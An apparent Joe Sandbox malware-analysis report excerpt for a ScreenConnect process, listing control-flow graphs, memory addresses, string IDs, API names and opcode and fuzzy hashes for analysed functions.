7ffd34720824-7ffd3472082e 1352->1368 1353->1326 1353->1327 1360 7ffd34720779-7ffd3472078f 1356->1360 1357->1360 1365 7ffd34720791-7ffd347207a4 call 7ffd347200e0 1360->1365 1366 7ffd347207a6-7ffd347207ad 1360->1366 1365->1366 1378 7ffd347207cd-7ffd347207d0 1365->1378 1376 7ffd347207b4-7ffd347207c7 1366->1376 1371 7ffd34720830-7ffd34720832 1368->1371 1372 7ffd34720834-7ffd34720842 call 7ffd347200e0 1368->1372 1375 7ffd34720845-7ffd34720862 1371->1375 1372->1375 1382 7ffd34720864-7ffd34720866 1375->1382 1383 7ffd34720868-7ffd34720876 call 7ffd347200e0 1375->1383 1376->1378 1380 7ffd347207d2-7ffd347207e5 call 7ffd347200e0 1378->1380 1381 7ffd347207e7-7ffd347207fa 1378->1381 1380->1352 1380->1381 1381->1352 1385 7ffd34720879-7ffd34720896 1382->1385 1383->1385 1390 7ffd34720898-7ffd3472089a 1385->1390 1391 7ffd3472089c-7ffd347208aa call 7ffd347200e0 1385->1391 1393 7ffd347208ad-7ffd347208b6 1390->1393 1391->1393 1393->1367
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 01[4$h4q4$0q4$2q4
                                                                                                              • API String ID: 0-2162733524
                                                                                                              • Opcode ID: b0f03b1533e8c04c3a2681ae7a805789356a15946680333569da759e2949057e
                                                                                                              • Instruction ID: ede578ac410c741c5f6988592b6805922187c23e55016bb4a80d30c6df963f5b
                                                                                                              • Opcode Fuzzy Hash: b0f03b1533e8c04c3a2681ae7a805789356a15946680333569da759e2949057e
                                                                                                              • Instruction Fuzzy Hash: 971209A1B0DA8A8FE7A9E72C84B56B537D1EF56350F0440BAD64DCB193DD1CF84293A0
                                                                                                              Function 00007FFD34727649 Relevance: 2.9, Strings: 2, Instructions: 427COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2080 7ffd34727649-7ffd3472765c 2082 7ffd34727662-7ffd347276a3 2080->2082 2083 7ffd34727798-7ffd347277ca 2080->2083 2098 7ffd347276a5-7ffd347276d7 call 7ffd347259f0 2082->2098 2099 7ffd347276d9-7ffd347276e3 2082->2099 2090 7ffd34727800-7ffd3472781e call 7ffd34720c30 * 2 2083->2090 2091 7ffd347277cc-7ffd347277fa 2083->2091 2110 7ffd34727a9e-7ffd34727abc call 7ffd34720c30 * 2 2090->2110 2111 7ffd34727824-7ffd3472782c 2090->2111 2091->2090 2101 7ffd34727c08-7ffd34727c26 call 7ffd34720c30 * 2 2091->2101 2098->2099 2104 7ffd347276e4 2099->2104 2105 7ffd347276e5-7ffd3472770e 2099->2105 2121 7ffd34727d32-7ffd34727d3d 2101->2121 2122 7ffd34727c2c-7ffd34727c33 2101->2122 2104->2105 2133 7ffd34727abe-7ffd34727ac8 2110->2133 2134 7ffd34727ae6-7ffd34727b04 call 7ffd34720c30 * 2 2110->2134 2118 7ffd34727833-7ffd34727836 2111->2118 2123 7ffd34727838-7ffd3472783a 2118->2123 2124 7ffd3472783c-7ffd3472784a call 7ffd347200e0 2118->2124 2127 7ffd34727c46-7ffd34727c48 2122->2127 2128 7ffd34727c35-7ffd34727c44 2122->2128 2129 7ffd3472784d-7ffd34727862 2123->2129 2124->2129 2132 7ffd34727c4f-7ffd34727c73 2127->2132 2128->2127 2146 7ffd34727c4a 2128->2146 2141 7ffd34727864-7ffd34727866 2129->2141 2142 7ffd34727868-7ffd3472788c call 7ffd34726698 * 2 2129->2142 2149 7ffd34727cbf-7ffd34727cce 2132->2149 2150 7ffd34727c75-7ffd34727c92 2132->2150 2137 7ffd34727aca-7ffd34727ada 2133->2137 2138 7ffd34727adc 2133->2138 2161 7ffd34727b0a-7ffd34727b15 2134->2161 2162 7ffd34727bbb-7ffd34727bc6 2134->2162 2143 7ffd34727ade-7ffd34727adf 2137->2143 2138->2143 2147 7ffd3472788f-7ffd347278a4 2141->2147 2142->2147 2143->2134 2146->2132 2163 7ffd347278a6-7ffd347278a8 2147->2163 2164 7ffd347278aa-7ffd347278ce call 7ffd34726698 * 2 2147->2164 2149->2121 2158 7ffd34727d3e-7ffd34727db7 2150->2158 2159 7ffd34727c98-7ffd34727cbd 2150->2159 2194 7ffd34727e00-7ffd34727e56 2158->2194 2195 7ffd34727db9-7ffd34727dfd 2158->2195 2159->2149 2174 7ffd34727b17-7ffd34727b19 2161->2174 2175 7ffd34727b1b-7ffd34727b2a call 7ffd347200e0 2161->2175 2176 7ffd34727bc8-7ffd34727bca 2162->2176 2177 7ffd34727bcc-7ffd34727bdb call 7ffd347200e0 2162->2177 2167 7ffd347278d1-7ffd347278e6 2163->2167 2164->2167 2190 7ffd347278e8-7ffd347278ea 2167->2190 2191 7ffd347278ec-7ffd34727904 call 7ffd34726698 2167->2191 2184 7ffd34727b2d-7ffd34727b61 2174->2184 2175->2184 2185 7ffd34727bde-7ffd34727be0 2176->2185 2177->2185 2184->2162 2196 7ffd34727b63-7ffd34727b68 2184->2196 2185->2121 2187 7ffd34727be6-7ffd34727c07 2185->2187 2199 7ffd34727913-7ffd34727921 2190->2199 2191->2199 2218 7ffd34727e58-7ffd34727e59 2194->2218 2219 7ffd34727e5c-7ffd34727e80 2194->2219 2237 7ffd34727dfe 2195->2237 2201 7ffd34727b6b-7ffd34727b71 2196->2201 2214 7ffd34727923-7ffd34727925 2199->2214 2215 7ffd34727927-7ffd34727935 call 7ffd347200e0 2199->2215 2205 7ffd34727b84-7ffd34727b8c 2201->2205 2206 7ffd34727b73-7ffd34727b7b 2201->2206 2210 7ffd34727b8d-7ffd34727b8e 2205->2210 2213 7ffd34727b9e 2205->2213 2206->2210 2211 7ffd34727b7d-7ffd34727b82 2206->2211 2217 7ffd34727b93-7ffd34727b9d call 7ffd347266d0 2210->2217 2211->2217 2221 7ffd34727ba4-7ffd34727bb9 2213->2221 2222 7ffd34727938-7ffd34727939 2214->2222 2215->2222 2217->2221 2218->2219 2234 7ffd34727eb2-7ffd34727ebb 2219->2234 2235 7ffd34727e82-7ffd34727e91 2219->2235 2221->2162 2221->2201 2227 7ffd34727940-7ffd34727941 2222->2227 2233 7ffd34727948-7ffd3472794f 2227->2233 2233->2110 2236 7ffd34727955-7ffd3472795c 2233->2236 2238 7ffd34727e93-7ffd34727e94 2235->2238 2239 7ffd34727e97-7ffd34727eb1 2235->2239 2236->2110 2240 7ffd34727962-7ffd34727979 2236->2240 2237->2237 2238->2239 2243 7ffd347279ae-7ffd347279b9 2240->2243 2244 7ffd3472797b-7ffd3472798d 2240->2244 2248 7ffd347279bf-7ffd347279ce call 7ffd347200e0 2243->2248 2249 7ffd347279bb-7ffd347279bd 2243->2249 2250 7ffd3472798f-7ffd34727991 2244->2250 2251 7ffd34727993-7ffd347279a1 call 7ffd347200e0 2244->2251 2252 7ffd347279d1-7ffd347279d3 2248->2252 2249->2252 2254 7ffd347279a4-7ffd347279a7 2250->2254 2251->2254 2256 7ffd34727a88-7ffd34727a9a 2252->2256 2257 7ffd347279d9-7ffd347279f0 2252->2257 2254->2243 2256->2110 2257->2256 2262 7ffd347279f6-7ffd34727a13 2257->2262 2265 7ffd34727a1f 2262->2265 2266 7ffd34727a15-7ffd34727a1d 2262->2266 2267 7ffd34727a21-7ffd34727a23 2265->2267 2266->2267 2267->2256 2269 7ffd34727a25-7ffd34727a2f 2267->2269 2270 7ffd34727a3d-7ffd34727a45 2269->2270 2271 7ffd34727a31-7ffd34727a3b call 7ffd34724708 2269->2271 2273 7ffd34727a73-7ffd34727a86 call 7ffd347266c0 2270->2273 2274 7ffd34727a47-7ffd34727a6c call 7ffd34725b00 2270->2274 2271->2110 2271->2270 2273->2110 2274->2273
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: pYr4$xYr4
                                                                                                              • API String ID: 0-2110079078
                                                                                                              • Opcode ID: 7bd4e6591b357d6a492e816403fbcc99a9cd26161011102cf24a0f8e201f55bb
                                                                                                              • Instruction ID: 72ea2ff5219a936ac2da992f0f22a3d8874fef7b669ea60dc1076a02194ef887
                                                                                                              • Opcode Fuzzy Hash: 7bd4e6591b357d6a492e816403fbcc99a9cd26161011102cf24a0f8e201f55bb
                                                                                                              • Instruction Fuzzy Hash: 29E10871B1DA478FE7A5A72845B16F937E2EF86390F110079D14DC32C6DE2CB9069380
                                                                                                              Function 00007FFD34726B94 Relevance: .4, Instructions: 443COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b1f71325a333ff59a3f4550605d91a025f68238baceb197301aa43fcbe5e4f9f
                                                                                                              • Instruction ID: 7da55fb460fffcfd647926d875c7dba74a681ada5c7d3461569e0ad48d592871
                                                                                                              • Opcode Fuzzy Hash: b1f71325a333ff59a3f4550605d91a025f68238baceb197301aa43fcbe5e4f9f
                                                                                                              • Instruction Fuzzy Hash: 0EE1FA71B1C94B8BEBA5AB2885F16F937E2EF86380F550079D64DC72C6DD2CB9059380
                                                                                                              Function 00007FFD34726B48 Relevance: .4, Instructions: 388COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 59c71dc5d3d78ec9ce125c7338ab2c3fc8b7ce23f31e28749b24df26345055ae
                                                                                                              • Instruction ID: bcb220a747c1d994f2b85ceb67ec9d621fc0b6e212fd194a33533894389e1a86
                                                                                                              • Opcode Fuzzy Hash: 59c71dc5d3d78ec9ce125c7338ab2c3fc8b7ce23f31e28749b24df26345055ae
                                                                                                              • Instruction Fuzzy Hash: 37C1D971B1D94BCBE7A99B2885F16FD32E2EF86390F510079D64DC32C6DD2CB9069280
                                                                                                              Function 00007FFD347226A8 Relevance: 6.6, Strings: 5, Instructions: 330COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1202 7ffd347226a8-7ffd347226ad 1203 7ffd347226af 1202->1203 1204 7ffd347226f3-7ffd34722705 1202->1204 1207 7ffd347226b1-7ffd347226b4 1203->1207 1208 7ffd347226e5-7ffd347226f0 1203->1208 1205 7ffd34722751-7ffd347227b5 1204->1205 1206 7ffd34722707-7ffd34722724 1204->1206 1220 7ffd34722816-7ffd3472281f 1205->1220 1221 7ffd347227b7-7ffd3472280b 1205->1221 1213 7ffd34723615-7ffd34723630 1206->1213 1214 7ffd3472272a-7ffd3472274f 1206->1214 1212 7ffd347226b6 1207->1212 1208->1204 1212->1212 1216 7ffd347226b8-7ffd347226dd 1212->1216 1224 7ffd34723632-7ffd3472363b 1213->1224 1225 7ffd3472367a-7ffd34723693 1213->1225 1214->1205 1216->1208 1226 7ffd3472287d-7ffd34722895 1220->1226 1227 7ffd34722821-7ffd34722845 1220->1227 1231 7ffd3472363c-7ffd3472364c 1224->1231 1238 7ffd34722332-7ffd34722347 1226->1238 1239 7ffd3472289b-7ffd347228b2 1226->1239 1236 7ffd34722847-7ffd34722849 1227->1236 1240 7ffd3472364e-7ffd34723675 1231->1240 1236->1236 1241 7ffd3472284b-7ffd3472286b 1236->1241 1247 7ffd347228bd-7ffd347228d0 call 7ffd347211d8 1239->1247 1240->1225 1246 7ffd3472286d-7ffd34722874 1241->1246 1250 7ffd347228d5-7ffd347228d7 1247->1250 1250->1238 1251 7ffd347228dd-7ffd34722913 1250->1251 1251->1213
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MA4$HQA4$`14$h14$p14
                                                                                                              • API String ID: 0-2168121343
                                                                                                              • Opcode ID: db7e8e4592fe2c3bdfaf9267120f6c12733a3684ec86c7573b5376c8e1679b2e
                                                                                                              • Instruction ID: 5ac3e9c7a547329658ba61fb7435b54b786d7903433798815e9e615bf958d824
                                                                                                              • Opcode Fuzzy Hash: db7e8e4592fe2c3bdfaf9267120f6c12733a3684ec86c7573b5376c8e1679b2e
                                                                                                              • Instruction Fuzzy Hash: 48A10AB270CA498FEB98EE28C4A5AA537D1FF55350B0401B9D54DD7287DE29FC02C780
                                                                                                              Function 00007FFD3472BDF5 Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1457 7ffd3472bdf5-7ffd3472be0a 1458 7ffd3472be40 1457->1458 1459 7ffd3472be0c-7ffd3472be3e 1457->1459 1461 7ffd3472be42-7ffd3472be5f 1458->1461 1462 7ffd3472be8c-7ffd3472beaf 1458->1462 1459->1458 1467 7ffd3472be65-7ffd3472be8a 1461->1467 1468 7ffd3472bf59-7ffd3472bf61 1461->1468 1465 7ffd3472bf44 1462->1465 1466 7ffd3472beb5-7ffd3472bec7 1462->1466 1469 7ffd3472bf45-7ffd3472bf47 1465->1469 1470 7ffd3472bf0f-7ffd3472bf1e 1466->1470 1471 7ffd3472bec9-7ffd3472bee6 1466->1471 1467->1462 1478 7ffd3472bf62-7ffd3472bf71 1468->1478 1472 7ffd3472bf51-7ffd3472bf58 1469->1472 1473 7ffd3472bf49-7ffd3472bf4a 1469->1473 1476 7ffd3472bf20 1470->1476 1471->1478 1479 7ffd3472bee8-7ffd3472bf0d 1471->1479 1473->1472 1476->1465 1484 7ffd3472bf73-7ffd3472bf75 1478->1484 1485 7ffd3472bf76-7ffd3472bf8a 1478->1485 1479->1470 1484->1485 1487 7ffd3472bfc0-7ffd3472bfc3 1485->1487 1488 7ffd3472bf8c-7ffd3472bfaa 1485->1488 1487->1469 1494 7ffd3472bfc5-7ffd3472bfcd 1487->1494 1492 7ffd3472bfe0-7ffd3472bfea 1488->1492 1493 7ffd3472bfac-7ffd3472bfbb 1488->1493 1495 7ffd3472c020-7ffd3472c037 1492->1495 1496 7ffd3472bfec-7ffd3472c002 1492->1496 1493->1487 1503 7ffd3472c039-7ffd3472c056 1495->1503 1499 7ffd3472c004-7ffd3472c015 1496->1499 1500 7ffd3472c058-7ffd3472c060 1496->1500 1502 7ffd3472c017-7ffd3472c01e 1499->1502 1499->1503 1502->1495 1503->1500
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \C4$0G|4$D|4$F|4
                                                                                                              • API String ID: 0-171402600
                                                                                                              • Opcode ID: f3df10e46081ca6e7d7b37573cfe4d8f047ced0500edc1f17ad9e8e40b773045
                                                                                                              • Instruction ID: ea571fa746468a2514dc48a071cfaae4b21f25702d80c18fab1533939a33eaa1
                                                                                                              • Opcode Fuzzy Hash: f3df10e46081ca6e7d7b37573cfe4d8f047ced0500edc1f17ad9e8e40b773045
                                                                                                              • Instruction Fuzzy Hash: 78711762B0DB8A4FE796DB2C98A85613BE1EF9735070841FBD189CB197D918FC058781
                                                                                                              Function 00007FFD3472CBF0 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1506 7ffd3472cbf0-7ffd3472cbfa 1508 7ffd3472cc30-7ffd3472cc33 1506->1508 1509 7ffd3472cbfc-7ffd3472cc27 1506->1509 1511 7ffd3472cc3d-7ffd3472cc75 1508->1511 1509->1508 1516 7ffd3472cc77-7ffd3472ccb9 1511->1516 1517 7ffd3472ccbb-7ffd3472ccd0 1511->1517 1516->1517 1520 7ffd3472cd57-7ffd3472cd60 1517->1520 1521 7ffd3472ccd6-7ffd3472ccff 1517->1521 1527 7ffd3472cd01-7ffd3472cd43 1521->1527 1528 7ffd3472cd45-7ffd3472cd55 1521->1528 1527->1528 1528->1520
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: h`|4$h`|4$pa|4$pa|4
                                                                                                              • API String ID: 0-729069609
                                                                                                              • Opcode ID: 58b2b797810a92226795923cdb4351f97be00b2478e671eaf6a542886bda5a8f
                                                                                                              • Instruction ID: 05ecf676beff01200e938194ce032e18b419466e63fda7b6d9911cba693ef4a0
                                                                                                              • Opcode Fuzzy Hash: 58b2b797810a92226795923cdb4351f97be00b2478e671eaf6a542886bda5a8f
                                                                                                              • Instruction Fuzzy Hash: 6F415892B1DA4A4FE7A5E72C18E56757BD1EFA968074401B6E40CC3287DC1AFC4583C2
                                                                                                              Function 00007FFD3472AF98 Relevance: 4.1, Strings: 3, Instructions: 344COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `\C4$p\C4$0q4
                                                                                                              • API String ID: 0-3602877608
                                                                                                              • Opcode ID: 491e8796772830d8b9141064aa3c0ccd9b760f61888ad1c207163852bc247226
                                                                                                              • Instruction ID: faf448903deaa171bc8d97899ef5aa84de180600192901067a757c0a2d22bc1c
                                                                                                              • Opcode Fuzzy Hash: 491e8796772830d8b9141064aa3c0ccd9b760f61888ad1c207163852bc247226
                                                                                                              • Instruction Fuzzy Hash: A0B19470B1890A8FEBA8EB1C84A9B6973E1FF99340F5401B9D40DD7296DE29FC41D780
                                                                                                              Function 00007FFD3472B38A Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0,|4$@*|4$x\C4
                                                                                                              • API String ID: 0-2875663441
                                                                                                              • Opcode ID: 7528ef0b4c7f5f4c3dd54419b48bece38b07f3098249a24ceb8b73161ff51c6a
                                                                                                              • Instruction ID: 9d3777b1873644b4745534701f52322e1682e0500ec97ca81cd03d22795c7e71
                                                                                                              • Opcode Fuzzy Hash: 7528ef0b4c7f5f4c3dd54419b48bece38b07f3098249a24ceb8b73161ff51c6a
                                                                                                              • Instruction Fuzzy Hash: 7961C172B0C94A8FEBA8EE1894E56B533D1FF96394F1404BAC14DC7192DE29BC0687C0
                                                                                                              Function 00007FFD347256C9 Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1973 7ffd347256c9-7ffd347256f1 1975 7ffd347256f8-7ffd347256fa 1973->1975 1976 7ffd34725700-7ffd3472571b 1975->1976 1977 7ffd34725789-7ffd34725792 1975->1977 1979 7ffd3472571d-7ffd34725732 1976->1979 1980 7ffd34725734-7ffd34725749 1976->1980 1979->1980 1983 7ffd34725793-7ffd34725794 1980->1983 1984 7ffd3472574b-7ffd34725779 1980->1984 1985 7ffd34725796-7ffd347257ad 1983->1985 1991 7ffd347257af-7ffd347257c6 1984->1991 1992 7ffd3472577b-7ffd34725786 1984->1992 1985->1991 1993 7ffd347257c7-7ffd347257d2 1991->1993 1992->1977 1996 7ffd347257d4-7ffd347257d9 1993->1996 1997 7ffd34725808-7ffd34725826 1993->1997 1996->1993 1999 7ffd347257db-7ffd347257f0 1996->1999 2002 7ffd34725828-7ffd3472582e 1997->2002 1999->1985 2001 7ffd347257f2 1999->2001 2001->2002 2003 7ffd347257f4-7ffd347257f9 2001->2003 2004 7ffd3472582f-7ffd34725841 2002->2004 2008 7ffd34725843-7ffd3472586c 2004->2008 2012 7ffd3472586e 2008->2012 2013 7ffd347258a2 2008->2013 2012->2013
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: X'B4$0q4$2q4
                                                                                                              • API String ID: 0-3584558210
                                                                                                              • Opcode ID: 65401da90ae2ebd6f421356ed5892090aeb0e7b34f6af39c73840e3361f7a470
                                                                                                              • Instruction ID: 53b6699a0b446503e0a9825b962be28182f6df21f1c51c934ed4ee66101263ce
                                                                                                              • Opcode Fuzzy Hash: 65401da90ae2ebd6f421356ed5892090aeb0e7b34f6af39c73840e3361f7a470
                                                                                                              • Instruction Fuzzy Hash: 6851D692A0E7C29FE793AB7C58E51A13FA0DF13194B1901FBC188CB193DD1D780A8391
                                                                                                              Function 00007FFD3472703B Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @Yr4$h4q4
                                                                                                              • API String ID: 0-1758452891
                                                                                                              • Opcode ID: 0df29022373fdbb69e2c9cd5969dd377d6930f11420ed156de77ed90492aa9a3
                                                                                                              • Instruction ID: 1f9744096d9efeb6345ee1260f904b2cf712191aee6bc2878589d6a7f517ad95
                                                                                                              • Opcode Fuzzy Hash: 0df29022373fdbb69e2c9cd5969dd377d6930f11420ed156de77ed90492aa9a3
                                                                                                              • Instruction Fuzzy Hash: E33109A2A1C94A8FF7A8AE5894E63F533D1EF95394F04407ED54EC7187DD6CB8468380
                                                                                                              Function 00007FFD34418014 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4030431394.00007FFD34410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34410000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MitigationPolicyProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1088084561-0
                                                                                                              • Opcode ID: a4939b6c2cfcf6142766954bef22ec9f37993679cb903c6f2ed0bcda40337c27
                                                                                                              • Instruction ID: a0325d32f16c2aca957d4e68461f575f18d4dd66a856ea7ce52388b0f3c98dc7
                                                                                                              • Opcode Fuzzy Hash: a4939b6c2cfcf6142766954bef22ec9f37993679cb903c6f2ed0bcda40337c27
                                                                                                              • Instruction Fuzzy Hash: 5E514931D0CB494FDB28AFA8984A5E97FE0EF56310F05417FE489C3192DE6CA846CB91
                                                                                                              Function 00007FFD34413642 Relevance: 1.7, APIs: 1, Instructions: 172pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4030431394.00007FFD34410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34410000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2489174969-0
                                                                                                              • Opcode ID: e028b7e3b839411676e511927155c4cbb386b9a2c55765ea3364cfb24487f2f5
                                                                                                              • Instruction ID: b10f50bdba8c9e4a8ed772fcf9aa80d3d7028efbd2fef547332f6fae1d487f86
                                                                                                              • Opcode Fuzzy Hash: e028b7e3b839411676e511927155c4cbb386b9a2c55765ea3364cfb24487f2f5
                                                                                                              • Instruction Fuzzy Hash: D551B17191CA1C8FDB68EF5C9845BE9BBE0FB59720F1442AEE04DD3251CB70A8518BC1
                                                                                                              Function 00007FFD34413662 Relevance: 1.6, APIs: 1, Instructions: 121pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4030431394.00007FFD34410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34410000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191148154-0
                                                                                                              • Opcode ID: b43838e28aeecbe9898034062339ed579eed4bd0dc19c3d0b4d529329e56c6bf
                                                                                                              • Instruction ID: bc10e949b9f69bef24e7031fc8aa2ca1b3afcabbab2045cd20122db2ecd17942
                                                                                                              • Opcode Fuzzy Hash: b43838e28aeecbe9898034062339ed579eed4bd0dc19c3d0b4d529329e56c6bf
                                                                                                              • Instruction Fuzzy Hash: 4A318F70A08A1C8FDB58EF98C849BE9B7F1FB59311F00826AD00DD7255CB74A885CB81
                                                                                                              Function 00007FFD34724D45 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: H
                                                                                                              • API String ID: 0-2852464175
                                                                                                              • Opcode ID: faf7c454d8c05718a0884e3cf5c8222ac82d7c4d53f6fbe27f0643f0ba894bac
                                                                                                              • Instruction ID: bd82828c44651e8f0468831b48dea99f0f033961343cef53d7ecfd0292906530
                                                                                                              • Opcode Fuzzy Hash: faf7c454d8c05718a0884e3cf5c8222ac82d7c4d53f6fbe27f0643f0ba894bac
                                                                                                              • Instruction Fuzzy Hash: 7851C692F0D6C68FF7A6973848B51A47BE1EF47280B0945FAC289CB1D3DE1CB8459351
                                                                                                              Function 00007FFD34729276 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (\C4
                                                                                                              • API String ID: 0-3682887530
                                                                                                              • Opcode ID: adb95e7e9c0fafed58c502f62bbe96acc49bcd32bf6680d3e2c170225281c614
